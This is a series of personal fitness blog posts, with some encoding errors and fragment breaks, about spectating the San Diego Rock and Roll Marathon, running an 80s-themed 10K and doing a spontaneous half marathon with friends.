Can you believe that itâ€
s already half way through the year?! Crazy right? Maybe I should look back on my New Yearâ€
s Goals and re-evaluate how I am doing.Â
How are you doing? June also means summer is just around the corner! Guess I am glad I am SHREDDING it UP with all my June Summer Shredders!
This weekend was kicked off with our #FridayFunDay! I work about 16 hour days all week, between being a Mama, Personal Trainer, Kickboxing Instructor, Blogger, Retreat Coordinator and Refresh Attire Owner! I love it all so much, but I feel like I just need a day to fully disconnect! So Fridays are our new Sabbath.
This Friday we hit up the beach for some fun in the sun. It was amazing!
This weekend I also had the great pleasure to spectate my first Marathon! I know crazy, right?! My dear friend/running buddy was running her 6th marathon at the Rock and Roll San Diego Marathon. RJ and I tagged along to cheer her on!
We arrived on Saturday and hit up the EXPO, oh how I love RNR EXPOS! So many fun things to see and taste. There wasnâ€
t too much that I didnâ€
t see at the Boston Marathon Expo, but there were two people that I was thrilled to run into!!! Monica from Run Eat Repeat and Meghann from Meals and Miles! Two of my longest blogger friends who I adore! It was so good to catch up with them and cheer them on in the race as well.
It was kind of weird going out to dinner with the racers and not trying to “carb load†myself. I did enjoy some pasta because  you have to “when in Little Italy†and some wine. It was kind of nice not worrying about what I was going to eat!
We hit the hay early and got up even earlier! Thank goodness RJ is an easy baby and an early riser, she was a little champ waking up to say good luck at the start line with Susie.
The only other time we got a chance to see her was at mile 5. Where we saw Skinny Runner and Monica as well.
Then we headed to the finish line. I have so much respect for spectators, itâ€
s a crazy hot mess out there! Trying to get to the finish line was crazy! But we made it about .6 of a mile out and I got to cheer Susie on one more time and her daughter even jumped in to finish with her!
She did amazing! Kinda made me want to do another. OH NO! I got all emotional just watching! Races make me such a sap!
We celebrated with some wonderful Mexican food and of course a Margarita …I mean I did walk about 6 miles with a baby. That counts for something, right?!
We hit the road and got home in time for SUNDAY baseball!!!! I still had some work to catch up on, but it wasnâ€
t so bad working outside with this view.
Such a fun weekend!
Question: Have you ever spectated a race?
]]>
s 10K in Pasadena and because I honestly made no real plans all weekend and it was going to be FREE I couldnâ€
t think of anything that would be more fun. I dug through my closet and got a few things at a local teeny bopper store and I think I put together a pretty darn good 80â€
s running outfit (although I wish I would have had a leotard and tights).
My team was so awesome, they even ordered LEG WARMERS! Hello neon green ![]()
We met up at 6am in front of Panera and got all dolled up. I honestly felt like a cheerleader all over again.
I ran in honor of a 61 year old man…pretty sure I placed for him ![]()
As you can see I was the only one without a green shirt and poor guy in the back had to hang with us crazy girls
We were out of control!
Probably the first time I did my hair and makeup for a race.
I stole Hubbyâ€
s head band from his Tough Mudder Race, it actually was perfect for the 90 degree weather!
Show a little leg….
Flash a little hand…
The outfits at the race were so fun, I love how many people really got into it!
I honestly donâ€
t think I have ever had this much fun waiting for the start to a race!
The race started at 9am, but we didnâ€
t officially start till almost 10am! With the heat wave, I knew that this was truly just going to be a FUN RUN!!! The course was nice and flat and it was a two lap course. The only down fall was they only had two water stops. The girls and I all stayed together at a lovely 9 minute pace and just chatted the whole time, which made the race fly by!
I did race hard with one of our team mates to the finish, because come on itâ€
s not a race if you donâ€
t sprint to the FINISH!
The only complaint I have about the race (it was their first one so I am giving them some slack) was they RAN OUT OF WATER!!!! I couldnâ€
t believe it! By the time we got water it was about 30 minutes after the finish, but we did find a guy selling Mexican Watermelon Popsicles and all was well in the world agan.
And the best part was the MEDALS! They were not cheap cassette tapes, they were heavy just like a regular medal. How cool are these???
Ok, now I really have the RACING ITCH!!! My next race isnâ€
t until November, but I am already researching and hoping to run something in October and December. Nothing like a spontaneous race to FALL back in love with running again!
80â€
s BABY!
Seeing as I have only run about 8 times since my HIM, I wasn’t sure I should do it, but I am a runner and I have been working out pretty much everyday since the HIM so I thought, “what the heck, we will treat it like a long run and just have fun!” So we did.
The best thing about the race is that it is only 20 minutes from my house and doesn’t start until 7am! So I got to eat a good size mini breakfast with whole wheat toast + PB + a banana + coffee!
We got to the race about 45 minutes early, picked our packets and headed for the start line.
As we were walking to the start line we met up with the OH SO BEAUTIFUL Monica from Run Eat Repeat. This is the second half marathon we have run together and we always have so much fun.
The course is pretty flat and the weather could not have been more perfect!!! The three of us chatted til about mile 9, where Susie had to walk due to a foot injury so Monica and I went ahead and finished strong!!
Susie finished a few minutes later and did awesome!!!
We did learn later that the course was about 12.4 miles (not a full half), but I’ll take it
Official Time 1:47 // Average pace 8:40 // Not bad for just a fun run!!
I loved the stress that was taken off from this race by doing it last minute! Now, I don’t recommend just anyone do a race last minute, especially a half marathon, but I knew my body could handle it.
I am kinda of getting antsy to do another one. I am thinking I might sign up for the The Temecula Half. Anyone local interested???
P.S. My Making the Cut Review will be posted this week so look out!! Plus I am starting another fun book, can’t wait to tell you about it!
